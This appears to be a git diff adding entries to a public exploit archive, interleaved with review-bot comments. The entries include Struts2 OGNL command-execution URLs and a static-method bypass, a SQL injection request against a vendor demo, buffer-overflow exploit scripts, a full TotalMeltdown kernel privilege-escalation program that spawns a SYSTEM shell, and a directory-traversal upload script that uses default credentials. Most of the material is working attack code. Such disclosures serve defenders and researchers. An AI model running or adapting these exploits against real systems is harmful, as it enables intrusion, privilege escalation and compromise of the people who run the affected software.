+ request and action to be executed on the server. DefaultActionMapper is
+ a default implementation of ActionMapper. It handles four types of
+ prefixed parameters: action:, redirect:, redirectAction: and method:.
+
+ For example, redirect prefix is used for HTTP redirect.
+
+ Normal redirect prefix usage in JSP:
+
+ ...
+
+
+
+
+ If the cancel button is clicked, redirection is performed.
+
+ Request URI for redirection:
+ /foo.action?redirect:http://www.google.com/
+
+ Resopnse Header:
+ HTTP/1.1 302 Found
+ Location: http://www.google.com/
+
+ Usage of other prefixed parameters is similar to redirect.
+ See Struts2 document for details.
+ https://cwiki.apache.org/confluence/display/WW/ActionMapper
+
+
+
+ As stated already, there are four types of prefixed parameters.
+
+ action:, redirect:, redirectAction:, method:
+
+ All except for method: can be used for attacks. But regarding action:,
+ it can be used only if wildcard mapping is enabled in configuration.
+ On the one hand, redirect: and redirectAction: are not constrained by
+ configuration (thus they are convenient for attackers).
+
+ One thing that should be noted is that prefixed parameters are quite
+ forceful.
It means that behavior of application which is not intended
+ to accept prefixed parameters can also be overwritten by prefixed
+ parameters added to HTTP request. Therefore all Struts2 applications
+ that use DefaultActionMapper are vulnerable to the attack.
+
+ The injection point is name of prefixed parameters.
+ Example of attack using redirect: is shown below.
+
+ Attack URI:
+ /bar.action?redirect:http://www.google.com/%25{1000-1}
+
+ Response Header:
+ HTTP/1.1 302 Found
+ Location: http://www.google.com/999
+
+ As you can see, expression (1000-1) is evaluated and the result (999)
+ is appeared in Location response header. As I shall explain later,
+ more complex attacks such as OS command execution is possible too.
+
+ In DefaultActionMapper, name of prefixed parameter is once stored as
+ ActionMapping object and is later executed as OGNL expression.
+ Rough method call flow in execution phase is as the following.
+
+ org.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter()
+ org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction()
+ org.apache.struts2.dispatcher.Dispatcher.serviceAction()
+ org.apache.struts2.dispatcher.StrutsResultSupport.execute()
+ org.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse()
+ com.opensymphony.xwork2.util.TextParseUtil.translateVariables()
+ com.opensymphony.xwork2.util.OgnlTextParser.evaluate()
+
+Proof of Concept:
+
+
+ PoC is already disclosed on vender's web page.
+ https://struts.apache.org/release/2.3.x/docs/s2-016.html
+
+ Below PoC URLs are just quotes from the vender's page.
+
+ Simple Expression:
+ http://host/struts2-blank/example/X.action?action:%25{3*4}
+ http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
+
+ OS Command Execution:
+ http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
+ http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
+ http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
+
+ Obviously such attacks are not specific to blank/showcase application,
+ but all Struts2 based applications may be subject to attacks.
+
+
+
+ Another topic that I think worth mentioning is that PoC URLs use
+ ProcessBuilder class to execute OS commands. The merit of using this
+ class is that it does not require static method to execute OS commands,
+ while Runtime class does require it.
+
+ As you may know, static method call in OGNL is basically prohibited.
+ But in Struts2 <= v2.3.14.1 this restriction was easily bypassed by
+ a simple trick:
+
+ %{#_memberAccess['allowStaticMethodAccess']=true,
+ @java.lang.Runtime@getRuntime().exec('your commands')}
+
+ In Struts v2.3.14.2, SecurityMemberAccess class has been changed to
+ prevent the trick. However there are still some techniques to call
+ static method in OGNL.
+
+ One technique is to use reflection to replace static method call to
+ instance method call. Another technique is to overwrite #_memberAccess
+ object itself rather than property of the object:
+
+ %{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),
+ @java.lang.Runtime@getRuntime().exec('your commands')}
+
+ Probably prevention against static method is just an additional layer
+ of defense, but I think that global objects such as #_memberAccess
+ should be protected from rogue update.
+
+Timeline:
+ 2013/06/24 Reported to Struts Security ML
+ 2013/07/17 Vender announced v2.3.15.1
+ 2013/08/10 Disclosure of this advisory
+
+Recommendation:
+ Immediate upgrade to the latest version is strongly recommended as
+ active attacks have already been observed. It should be noted that
+ redirect: and redirectAction: parameters were completely dropped and
+ do not work in the latest version as stated in the vender's page.
+ Thus attention for compatibility issues is required for upgrade.
+
+ If you cannot upgrade your Struts2 immediately, filtering (by custom
+ servlet filter, IPS, WAF and so on) can be a mitigation solution for
+ this vulnerability. Some points about filtering solution are listed
+ below.
+
+ - Both %{expr} and ${expr} notation can be used for attacks.
+ - Parameters both in querystring and in request body can be used.
+ - redirect: and redirectAction: can be used not only for Java method
+ execution but also for open redirect.
+
+ See S2-017 (CVE-2013-2248) for open redirect issue.
+ https://struts.apache.org/release/2.3.x/docs/s2-017.html
+
+Reference:
+ https://struts.apache.org/release/2.3.x/docs/s2-016.html
+ https://cwiki.apache.org/confluence/display/WW/ActionMapper
\ No newline at end of file
diff --git a/exploits/php/webapps/43347.txt b/exploits/php/webapps/43347.txt
new file mode 100644
index 000000000..b997a2be2
--- /dev/null
+++ b/exploits/php/webapps/43347.txt
@@ -0,0 +1,48 @@
+# Exploit Title: [Ciuis CRM v 1.0.7 Sql Injection]
+# Google Dork: [if applicable]
+# Date: [12/15/2017]
+# Exploit Author: [Zahid Abbasi]
+# Contact: http://twitter.com/zahidsec
+# Website: http://zahidabbasi.com
+# Vendor Homepage: [http://ciuis.com/]
+# Software Link: [https://codecanyon.net/item/ciuis-crm/20473489]
+# Version: [1.0.7] (REQUIRED)
+# Tested on: [Win 7 64-bit]
+# CVE : [if applicable]
+
+1. Description
+
+The injection required user registration on CIUS CRM. Old versions have
+not been tested but it's a guess, they are also vulnerable.
+The URL path filename appears to be vulnerable to SQL injection attacks.
+The payload 65079277 or 7647=07647 was submitted in the URL path
+filename, and a database error message was returned.
+You should review the contents of the error message, and the
+application's handling of other input, to confirm whether a
+vulnerability is present.
+
+2. Proof of Concept
+
+The live testing was done on demo site of the script.
+https://ciuis.com/demo/accounts/account/4 [URL path filename]
+Request:-
+GET /demo/accounts/account/465079277%20or%207647%3d07647 HTTP/1.1
+Host: ciuis.com
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0)
+Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: ci_session=98b5ef21cb2d123fb376f135218129226808fbec
+Connection: close
+Upgrade-Insecure-Requests: 1
+Response:-
+After placing our injection code and forwarding the request. The html
+response is posted below.
+
+

A Database Error Occurred

+

Error Number: 1064

You have an error in your SQL syntax; +check the manual that corresponds to your MariaDB server version for the +right syntax to use near 'and `transactiontype` =0)' at line +3

SELECT SUM(`amount`) AS `amount`
+--
\ No newline at end of file
diff --git a/exploits/php/webapps/44409.txt b/exploits/php/webapps/44409.txt
new file mode 100644
index 000000000..0e9f0227b
--- /dev/null
+++ b/exploits/php/webapps/44409.txt
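Review bot: The request captured under "2. Proof of Concept" still carries a concrete `Cookie: ci_session=...` value, which looks like a session identifier taken from the vendor's demo site; I would replace it with a placeholder, `Cookie: ci_session=<redacted>`, before the entry is archived. The description also reads like unverified scanner output (it asks the reader "to confirm whether a vulnerability is present"), so the SQL injection claim in the title rests only on the MariaDB syntax error quoted in the response. For defenders the entry would be more useful with a one-line remediation, for example `Fix: validate the account id in the URL path as an integer and pass it to the query as a bound parameter`. The quoted HTML response appears to have been cut by rendering, so the full failing statement is not visible here.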
@@ -0,0 +1,45 @@
+# Exploit Title : Activity Log Wordpress Plugin Stored Cross Site Scripting (XSS)
+# Date: 25-02-2018
+# Exploit Author : Stefan Broeder
+# Contact : https://twitter.com/stefanbroeder
+# Vendor Homepage: https://pojo.me
+# Software Link: https://wordpress.org/plugins/aryo-activity-log/
+# Version: 2.4.0
+# CVE : CVE-2018-8729
+# Category : webapps
+
+Description
+===========
+Activity Log is a WordPress plugin which tracks site activity. It has more than 70.000 active installations. Version 2.4.0 (and possibly the previous ones) are affected by several Stored XSS vulnerabilities.
+
+Vulnerable part of code
+=======================
+Storing the payload:
+File: aryo-activity-log/hooks/class-aal-hook-attachment.php:14. The log entry that is stored contains the result of get_the_title($post->ID), which can include HTML and is not sanitized by WordPress.
+File: aryo-activity-log/hooks/class-aal-hook-comments.php:14. The log entry that is stored contains the result of get_the_title($comment->comment_post_ID), which can include HTML and is not sanitized by WordPress.
+File: aryo-activity-log/hooks/class-aal-hook-posts.php:7. The log entry that is stored contains the result of $title = get_the_title($post), which can include HTML and is not sanitized by WordPress.
+
+Displaying the payload:
+File: aryo-activity-log/classes/class-aal-activity-log-list-table.php:209. $item->object_name is displayed without sanitization and can contain HTML tags.
+
+Impact
+======
+Arbitrary JavaScript code can be run on browser side if a user is able to create a post or upload an attachment.
+
+Exploitation
+============
+To successfully exploit this vulnerability, an attacker would have to perform any of the following:
+- Create/edit/draft/publish/trash/untrash a post with JavaScript in the title
+- Create/edit/trash/untrash/mark_as_spam/unmark_as_spam a comment on a post with JavaScript in the title
+- Add/edit/delete an attachment with JavaScript in the attachment title
+
+Regular website visitors will not have the capability to do any of these, however, possible threat actors might include:
+- A user with the role of ‘editor’ within WordPress (non-admins which are able to create content)
+- A rogue administrator among multiple administrators
+- A compromised plugin
+
+If the payload has been injected, then it will be executed once the Activity Log is viewed. This can possibly lead to stealing of CSRF nonces and creation of new (administrator) users on the WordPress instance.
+
+Solution
+========
+Update to 2.4.1
\ No newline at end of file
diff --git a/exploits/windows/dos/43116.py b/exploits/windows/dos/43116.py
new file mode 100755
index 000000000..0d30f610c
--- /dev/null
+++ b/exploits/windows/dos/43116.py
@@ -0,0 +1,41 @@
+#!/usr/bin/env python
+# coding: utf-8
+# Exploit Title: Jnes Version 1.0.2 Stack Buffer Overflow
+# Date: 3-11-2017
+# Exploit Author: crash_manucoot
+# Contact: twitter.com/crash_manucoot
+# Vendor Homepage: http://www.jabosoft.com/home
+# Software Link: http://www.jabosoft.com/categories/3
+# Version: v1.0.2.15
+# Tested on: Windows 7 Home Premium SP1 SPANISH
+# Category: Windows Local Exploit
+# How to use: open the emulator load any ROM go to options - cheats - add - Pro-Action Replay
+# paste the contents of the open.txt in the box

- click on ok +# you will get an error message click on ok close the cheat menu and bum + + +import struct + +fuzzing = open('open.txt','w+') + +eip = struct.pack(' +# EDX 00020000 pdmlog.00020000 +# EBX 00020000 pdmlog.00020000 +# ESP 035BFB90 +# EBP 035BFBAC +# ESI 00000002 +# EDI 00000000 +# EIP 42424242 + +# EAX 10013945 DVDPhoto.10013945 +# ECX 0002BF3B pdmlog. +# EDX 00020000 pdmlog.00020000 +# EBX 00020000 pdmlog.00020000 +# ESP 03A0FB90 +# EBP 03A0FBAC +# ESI 00000002 +# EDI 00000000 +# EIP 10013945 DVDPhoto.10013945 <- EIP Overwrite '\x45\x39\x01\x10' + +# outfile +file = "proof-of-concept.reg" + +# register re-write +padding = "\x41" * 548 +eipOffset = "\x45\x39\x01\x10" # PUSH ESP (0x10013945) +stackRewrite = "\x43" * 400 # Shellcode Space + +# generate exploit file containing above payload instructing EIP overwrite + +poc = "Windows Registry Editor Version 5.00\n\n" +poc = poc + "[HKEY_CURRENT_USER\Software\Socusoft Photo to Video Converter Free Version\General]\n" +poc = poc + "\"TempFolder\"=\"" + padding + eipOffset + stackRewrite + "\"" + +try: + print "[*] Generating exploit contents...\n"; + print "[*] Creating payload file...\n"; + writeFile = open (file, "w") + writeFile.write( poc ) + writeFile.close() + print "[*] Success!"; +except: + print "[!] ERROR!"; + +#EOF \ No newline at end of file diff --git a/exploits/windows/dos/44273.py b/exploits/windows/dos/44273.py new file mode 100755 index 000000000..5771111a2 --- /dev/null +++ b/exploits/windows/dos/44273.py 
@@ -0,0 +1,56 @@ +############################################################################### +# Exploit Title: Allok Video Converter - Buffer Overflow Vulnerability (Windows XP SP3) +# Date: 06-03-2018 +# Exploit Author: Mohan Ravichandran & Velayutham Selvaraj +# Organization : TwinTech Solutions +# Vulnerable Software: Allok Video Converter +# Vendor Homepage: http://www.alloksoft.com +# Version: 4.6.1217 +# Software Link: http://www.alloksoft.com/allok_vconverter.exe +# Tested On: Windows XP Service Pack 3 (Version 2002) +# +# Credit to Velayutham Selvaraj for discovering the Vulnerbility +# Vulnerability Disclosure Date : 2018-03-06 +# +# Manual steps to reproduce the vulnerability ... +#1. Download and install the "setup(allok_vconverter.exe)" file +#2. Run this exploit code via python 2.7 +#3. A file "exploit.txt" will be created +#4. Copy the contents of the file and paste in the License Name field +# Name > exploit.txt +#5. Type some random character in License Code +#6. Click Register and voila ! +#7. Boom calculator opens +# +############################################################################## +import struct + +file = open("exploit.txt","wb") +buflen = 4000 +junk = "A" * 780 +nseh = "\x90\x90\xeb\x10" +seh = struct.pack(" 1234 + +More information: https://www.tenable.com/blog/tenable-research-advisory-critical-schneider-electric-indusoft-web-studio-and-intouch-machine \ No newline at end of file diff --git a/exploits/windows/local/44573.txt b/exploits/windows/local/44573.txt new file mode 100644 index 000000000..2cb5e72e1 --- /dev/null +++ b/exploits/windows/local/44573.txt 
@@ -0,0 +1,48 @@
+% a PDF file using an XFA
+% most whitespace can be removed (truncated to 570 bytes or so...)
+% Ange Albertini BSD Licence 2012
+% modified by InsertScript
+
+%PDF-1. % can be truncated to %PDF-\0
+
+1 0 obj <<>>
+stream
+
+
+ 1
+
+
+
+
+endstream
+endobj
+
+trailer <<
+ /Root <<
+ /AcroForm <<
+ /Fields [<<
+ /T (0)
+ /Kids [<<
+ /Subtype /Widget
+ /Rect []
+ /T ()
+ /FT /Btn
+ >>]
+ >>]
+ /XFA 1 0 R
+ >>
+ /Pages <<>>
+ >>
+>>
\ No newline at end of file
diff --git a/exploits/windows/local/44581.c b/exploits/windows/local/44581.c
new file mode 100644
index 000000000..76a3c5789
--- /dev/null
+++ b/exploits/windows/local/44581.c
@@ -0,0 +1,353 @@ +#include "stdafx.h" + +#define PML4_BASE 0xFFFFF6FB7DBED000 +#define PDP_BASE 0xFFFFF6FB7DA00000 +#define PD_BASE 0xFFFFF6FB40000000 +#define PT_BASE 0xFFFFF68000000000 + +typedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS; + +#pragma pack(push,4) +typedef struct _CM_PARTIAL_RESOURCE_DESCRIPTOR { + UCHAR Type; + UCHAR ShareDisposition; + USHORT Flags; + union { + struct { + PHYSICAL_ADDRESS Start; + ULONG Length; + } Generic; + + struct { + PHYSICAL_ADDRESS Start; + ULONG Length; + } Port; + + struct { +#if defined(NT_PROCESSOR_GROUPS) + USHORT Level; + USHORT Group; +#else + ULONG Level; +#endif + ULONG Vector; + KAFFINITY Affinity; + } Interrupt; + + struct { + union { + struct { +#if defined(NT_PROCESSOR_GROUPS) + USHORT Group; +#else + USHORT Reserved; +#endif + USHORT MessageCount; + ULONG Vector; + KAFFINITY Affinity; + } Raw; + + struct { +#if defined(NT_PROCESSOR_GROUPS) + USHORT Level; + USHORT Group; +#else + ULONG Level; +#endif + ULONG Vector; + KAFFINITY Affinity; + } Translated; + } DUMMYUNIONNAME; + } MessageInterrupt; + + struct { + PHYSICAL_ADDRESS Start; + ULONG Length; + } Memory; + + struct { + ULONG Channel; + ULONG Port; + ULONG Reserved1; + } Dma; + + struct { + ULONG Channel; + ULONG RequestLine; + UCHAR TransferWidth; + UCHAR Reserved1; + UCHAR Reserved2; + UCHAR Reserved3; + } DmaV3; + + struct { + ULONG Data[3]; + } DevicePrivate; + + struct { + ULONG Start; + ULONG Length; + ULONG Reserved; + } BusNumber; + + struct { + ULONG DataSize; + ULONG Reserved1; + ULONG Reserved2; + } DeviceSpecificData; + + struct { + PHYSICAL_ADDRESS Start; + ULONG Length40; + } Memory40; + + struct { + PHYSICAL_ADDRESS Start; + ULONG Length48; + } Memory48; + + struct { + PHYSICAL_ADDRESS Start; + ULONG Length64; + } Memory64; + + struct { + UCHAR Class; + UCHAR Type; + UCHAR Reserved1; + UCHAR Reserved2; + ULONG IdLowPart; + ULONG IdHighPart; + } Connection; + + } u; +} CM_PARTIAL_RESOURCE_DESCRIPTOR, 
*PCM_PARTIAL_RESOURCE_DESCRIPTOR; +#pragma pack(pop,4) + +typedef enum _INTERFACE_TYPE { + InterfaceTypeUndefined, + Internal, + Isa, + Eisa, + MicroChannel, + TurboChannel, + PCIBus, + VMEBus, + NuBus, + PCMCIABus, + CBus, + MPIBus, + MPSABus, + ProcessorInternal, + InternalPowerBus, + PNPISABus, + PNPBus, + Vmcs, + ACPIBus, + MaximumInterfaceType +} INTERFACE_TYPE, *PINTERFACE_TYPE; + +typedef struct _CM_PARTIAL_RESOURCE_LIST { + USHORT Version; + USHORT Revision; + ULONG Count; + CM_PARTIAL_RESOURCE_DESCRIPTOR PartialDescriptors[1]; +} CM_PARTIAL_RESOURCE_LIST, *PCM_PARTIAL_RESOURCE_LIST; + +typedef struct _CM_FULL_RESOURCE_DESCRIPTOR { + INTERFACE_TYPE InterfaceType; + ULONG BusNumber; + CM_PARTIAL_RESOURCE_LIST PartialResourceList; +} *PCM_FULL_RESOURCE_DESCRIPTOR, CM_FULL_RESOURCE_DESCRIPTOR; + +typedef struct _CM_RESOURCE_LIST { + ULONG Count; + CM_FULL_RESOURCE_DESCRIPTOR List[1]; +} *PCM_RESOURCE_LIST, CM_RESOURCE_LIST; + +struct memory_region { + ULONG64 size; + ULONG64 address; +}; + +// Very hack'y way of trying to map out physical memory regions to try and reduce +// risk of BSOD +DWORD parse_memory_map(struct memory_region *regions) { + HKEY hKey = NULL; + LPTSTR pszSubKey = L"Hardware\\ResourceMap\\System Resources\\Physical Memory"; + LPTSTR pszValueName = L".Translated"; + LPBYTE lpData = NULL; + DWORD dwLength = 0, count = 0, type = 0;; + + if (!RegOpenKey(HKEY_LOCAL_MACHINE, pszSubKey, &hKey) == ERROR_SUCCESS) + { + printf("[*] Could not get reg key\n"); + return 0; + } + + if (!RegQueryValueEx(hKey, pszValueName, 0, &type, NULL, &dwLength) == ERROR_SUCCESS) + { + printf("[*] Could not query hardware key\n"); + return 0; + } + + lpData = (LPBYTE)malloc(dwLength); + RegQueryValueEx(hKey, pszValueName, 0, &type, lpData, &dwLength); + + CM_RESOURCE_LIST *resource_list = (CM_RESOURCE_LIST *)lpData; + + for (int i = 0; i < resource_list->Count; i++) { + for (int j = 0; j < resource_list->List[0].PartialResourceList.Count; j++) { + if 
(resource_list->List[i].PartialResourceList.PartialDescriptors[j].Type == 3) { + regions->address = resource_list->List[i].PartialResourceList.PartialDescriptors[j].u.Memory.Start.QuadPart; + regions->size = resource_list->List[i].PartialResourceList.PartialDescriptors[j].u.Memory.Length; + regions++; + count++; + } + } + } + + return count; +} + +int main() +{ + printf("TotalMeltdown PrivEsc exploit by @_xpn_\n"); + printf(" paging code by @UlfFrisk\n\n"); + + unsigned long long iPML4, vaPML4e, vaPDPT, iPDPT, vaPD, iPD; + DWORD done; + DWORD count; + + // Parse registry for physical memory regions + printf("[*] Getting physical memory regions from registry\n"); + struct memory_region *regions = (struct memory_region *)malloc(sizeof(struct memory_region) * 10); + + count = parse_memory_map(regions); + if (count == 0) { + printf("[X] Could not find physical memory region, quitting\n"); + return 2; + } + + for (int i = 0; i < count; i++) { + printf("[*] Phyiscal memory region found: %p - %p\n", regions[i].address, regions[i].address + regions[i].size); + } + + // Check for vulnerability + __try { + int test = *(unsigned long long *)PML4_BASE; + } + __except (EXCEPTION_EXECUTE_HANDLER) { + printf("[X] Could not access PML4 address, system likely not vulnerable\n"); + return 2; + } + + // setup: PDPT @ fixed hi-jacked physical address: 0x10000 + // This code uses the PML4 Self-Reference technique discussed, and iterates until we find a "free" PML4 entry + // we can hijack. + for (iPML4 = 256; iPML4 < 512; iPML4++) { + vaPML4e = PML4_BASE + (iPML4 << 3); + if (*(unsigned long long *)vaPML4e) { continue; } + + // When we find an entry, we add a pointer to the next table (PDPT), which will be + // stored at the physical address 0x10000 + *(unsigned long long *)vaPML4e = 0x10067; + break; + } + printf("[*] PML4 Entry Added At Index: %d\n", iPML4); + + // Here, the PDPT table is referenced via a virtual address. 
+ // For example, if we added our hijacked PML4 entry at index 256, this virtual address + // would be 0xFFFFF6FB7DA00000 + 0x100000 + // This allows us to reference the physical address 0x10000 as: + // PML4 Index: 1ed | PDPT Index : 1ed | PDE Index : 1ed | PT Index : 100 + vaPDPT = PDP_BASE + (iPML4 << (9 * 1 + 3)); + printf("[*] PDPT Virtual Address: %p", vaPDPT); + + // 2: setup 31 PDs @ physical addresses 0x11000-0x1f000 with 2MB pages + // Below is responsible for adding 31 entries to the PDPT + for (iPDPT = 0; iPDPT < 31; iPDPT++) { + *(unsigned long long *)(vaPDPT + (iPDPT << 3)) = 0x11067 + (iPDPT << 12); + } + + // For each of the PDs, a further 512 PT's are created. This gives access to + // 512 * 32 * 2mb = 33gb physical memory space + for (iPDPT = 0; iPDPT < 31; iPDPT++) { + if ((iPDPT % 3) == 0) + printf("\n[*] PD Virtual Addresses: "); + + vaPD = PD_BASE + (iPML4 << (9 * 2 + 3)) + (iPDPT << (9 * 1 + 3)); + printf("%p ", vaPD); + + for (iPD = 0; iPD < 512; iPD++) { + // Below, notice the 0xe7 flags added to each entry. + // This is used to create a 2mb page rather than the standard 4096 byte page. 
+ *(unsigned long long *)(vaPD + (iPD << 3)) = ((iPDPT * 512 + iPD) << 21) | 0xe7; + } + } + + printf("\n[*] Page tables created, we now have access to ~31gb of physical memory\n"); + + #define EPROCESS_IMAGENAME_OFFSET 0x2e0 + #define EPROCESS_TOKEN_OFFSET 0x208 + #define EPROCESS_PRIORITY_OFFSET 0xF // This is the offset from IMAGENAME, not from base + + unsigned long long ourEPROCESS = 0, systemEPROCESS = 0; + unsigned long long exploitVM = 0xffff000000000000 + (iPML4 << (9 * 4 + 3)); + STARTUPINFOA si; + PROCESS_INFORMATION pi; + + ZeroMemory(&si, sizeof(si)); + si.cb = sizeof(si); + ZeroMemory(&pi, sizeof(pi)); + + printf("[*] Hunting for _EPROCESS structures in memory\n"); + + for (int j = 0; j < count; j++) { + printf("[*] Trying physical region %p - %p\n", regions[j].address, regions[j].address + regions[j].size); + + for (unsigned long long i = regions[j].address; i < +regions[j].address + regions[j].size; i++) { + + __try { + // Locate EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field + if (ourEPROCESS == 0 && memcmp("TotalMeltdownP", (unsigned char *)(exploitVM + i), 14) == 0) { + if (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) { + ourEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET; + printf("[*] Found our _EPROCESS at %p\n", ourEPROCESS); + } + } + // Locate EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field + else if (systemEPROCESS == 0 && memcmp("System\0\0\0\0\0\0\0\0\0", (unsigned char *)(exploitVM + i), 14) == 0) { + if (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) { + systemEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET; + printf("[*] Found System _EPROCESS at %p\n", systemEPROCESS); + } + } + + if (systemEPROCESS != 0 && ourEPROCESS != 0) { + // Swap the tokens by copying the pointer to System Token field over our process token + printf("[*] Copying access token from %p to %p\n", systemEPROCESS + EPROCESS_TOKEN_OFFSET, ourEPROCESS + EPROCESS_TOKEN_OFFSET); + 
*(unsigned long long *)((char *)ourEPROCESS + EPROCESS_TOKEN_OFFSET) = *(unsigned long long *)((char *)systemEPROCESS + EPROCESS_TOKEN_OFFSET); + printf("[*] Done, spawning SYSTEM shell...\n\n"); + + CreateProcessA(0, + "cmd.exe", + NULL, + NULL, + TRUE, + 0, + NULL, + "C:\\windows\\system32", + &si, + &pi); + break; + } + } + __except (EXCEPTION_EXECUTE_HANDLER) { + printf("[X] Exception occured, stopping to avoid BSOD\n"); + return 2; + } + } + } + return 0; +} \ No newline at end of file diff --git a/exploits/windows/remote/44582.txt b/exploits/windows/remote/44582.txt new file mode 100644 index 000000000..0aacf54f1 --- /dev/null +++ b/exploits/windows/remote/44582.txt @@ -0,0 +1,11 @@ +A few years ago, I became aware of a security issue in most Call of Duty games. +Although I did not discover it myself, I thought it might be interesting to see what it could be used for. + +Without going into detail, this security issue allows users playing a Call of Duty match to cause a buffer overflow on the host’s system inside a stack-allocated buffer within the game’s network handling. +In consquence, this allows full remote code execution! + +The code has been published as the vulnerability used has been patched on all cod games as of 4/26/2018. + +For more information, read the post at https://momo5502.com/blog/?p=34 + +Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44582.zip \ No newline at end of file diff --git a/exploits/windows/webapps/44390.py b/exploits/windows/webapps/44390.py new file mode 100755 index 000000000..d33aeb424 --- /dev/null +++ b/exploits/windows/webapps/44390.py 
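Review bot: The new file 44581.c opens directly with `#include "stdafx.h"` and has no header comment, so apart from the `printf` banner in `main` nothing tells a reader which systems are affected or what the precondition is. The index row added for it reads only "Windows - Local Privilege Escalation". The precondition is visible in the `__try` block in `main`: a user-mode read of `PML4_BASE` has to succeed, otherwise the program prints "system likely not vulnerable" and returns 2. I would add a header comment such as `// Precondition: the page-table self-reference at PML4_BASE is readable from user mode; a host where that read faults is not affected.` and have it name the affected Windows builds and the fixing update, which this page does not state. The `EPROCESS_*_OFFSET` constants are presumably build-specific and deserve a one-line comment saying which build they were taken from.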
@@ -0,0 +1,72 @@ +''' +Tittle: LifeSize ClearSea 3.1.4 Directory Traversal Vulnerabilities +Author: rsp3ar +Impact: Remote Code Execution (Post-Authentication) +Recommendation: Use strong password for default 'admin' user and secure management access to the device. Please consult vendor for replacement/alternative solutions. +Timeline: +- 01.29.2018: Open Case 00302227 to notify the vulnerabilities. +- 01.30.2018: Got notified product is EoL as Jan 14 2017 and no longer supported. +- 02.05.2018: Open Case 00302876 to notify the intention of disclosure. +- 03.02.2018: Notify the tentative date for disclosure. +- 03.07.2018: Contacted by LifeSize and discussed the detail of vulnerabilities & discloure. +- 03.31.2018: Public Disclosure + + +Description +======================================== +LifeSize ClearSea is a client/server solution for desktop and mobile video collaboration. + +Version 3.1.4 has been End of Life since Jan 14 2017, and suffers from directory traversal +vulnerabilities. After authenticated as admin on Control Panel, attacker will be able to +1) Download arbitrary file; 2) Upload arbitrary file (leading to code execution). + +1. Arbitrary file (boot.ini) download via directory traversal vulnerabilities +http://x.x.x.x:8800/smartgui/media/ClearSea/smartgui/media/ClearSea/?guiID=CDRS_BROWSE_GRID&actionID=DownloadAll&rowIDs=../../../../../../../../../boot.ini +http://x.x.x.x:8800/smartgui/media/ClearSea/smartgui/media/ClearSea/?guiID=LOGS_BROWSE_GRID&actionID=DownloadAll&rowIDs=../../../../../../../../../boot.ini + +2. 
Arbitrary file upload +Below POC will create test.txt under C:\ +''' +#!/usr/bin/env python + +import sys +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS = 'RSA+AESGCM:RSA+AES:RC4-SHA' +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +# Update target URL and credentials +TARGET = "http://127.0.0.1:8800/" +USERNAME = "admin" +PASSWORD = "admin" + +LOGIN_PATH = "smartgui/" +UPLOAD_PATH = "smartgui/upload/-m-ClearSea-c-DHP_PKG_UPLOAD_FORM-w-filename/cfcyvcffiv/" +TEST_FILE_NAME = "test.txt" + +print("[*] Authenticate with %s..." % (TARGET)) +cookies = {} +# Get rootSessionID +r = requests.get(TARGET, verify=False) +cookies["rootSessionID"] = r.cookies["rootSessionID"] +# Get smartguiSessionID +auth_data = { + "smartGuiAuthenticate": "t", + "email": USERNAME, + "password": PASSWORD +} +r = requests.post(TARGET + LOGIN_PATH, data = auth_data, cookies = cookies, verify=False) +if r.cookies.get("smartguiSessionID") == None: + print("[!] Invalid Username or Password") + sys.exit() +cookies["smartguiSessionID"] = r.cookies["smartguiSessionID"] +print("[*] Authentication is successful!") + +print("[*] Create remote file C:\\%s..." % (TEST_FILE_NAME)) +files = { + "SmartGuiUploadField": (TEST_FILE_NAME, "This is a test file") +} +r = requests.post(TARGET + UPLOAD_PATH + "..\\" * 8 + TEST_FILE_NAME, files = files, + cookies = cookies, verify=False) +if r.status_code == requests.codes.ok: + print("[*] Remote file C:\\%s has been successfully created" % (TEST_FILE_NAME)) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 6996df1aa..fd47333cf 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
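Review bot: The `#!/usr/bin/env python` line comes after the module docstring, so it is an ordinary comment and the file, added with mode 100755, cannot be run directly; it belongs on line 1. In the failed-login branch, `sys.exit()` exits with status 0 and the check compares with `== None`; I would write `if r.cookies.get("smartguiSessionID") is None:` and `sys.exit(1)`. The module-level `DEFAULT_CIPHERS` override puts `RC4-SHA` back into the cipher list for every `requests` call in the process, although `TARGET` is plain `http://`, so it deserves a comment saying why it is there. The docstring gives a recommendation but no way to spot the issue in logs; a line such as "Log indicator: `DownloadAll` requests whose `rowIDs` contains `../`, and `smartgui/upload/` paths containing `..\`" would help anyone still running this end-of-life product.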
@@ -5799,6 +5799,7 @@ id,file,description,date,author,type,platform,port
 42970,exploits/linux/dos/42970.txt,"binutils 2.29.51.20170921 - 'read_1_byte' Heap Buffer Overflow",2017-10-10,"Agostino Sarubbo",dos,linux,
 42962,exploits/windows/dos/42962.py,"PyroBatchFTP 3.17 - Buffer Overflow (SEH)",2017-10-07,"Kevin McGuigan",dos,windows,
 42969,exploits/multiple/dos/42969.rb,"IBM Notes 8.5.x/9.0.x - Denial of Service (Metasploit)",2017-08-31,"Dhiraj Mishra",dos,multiple,
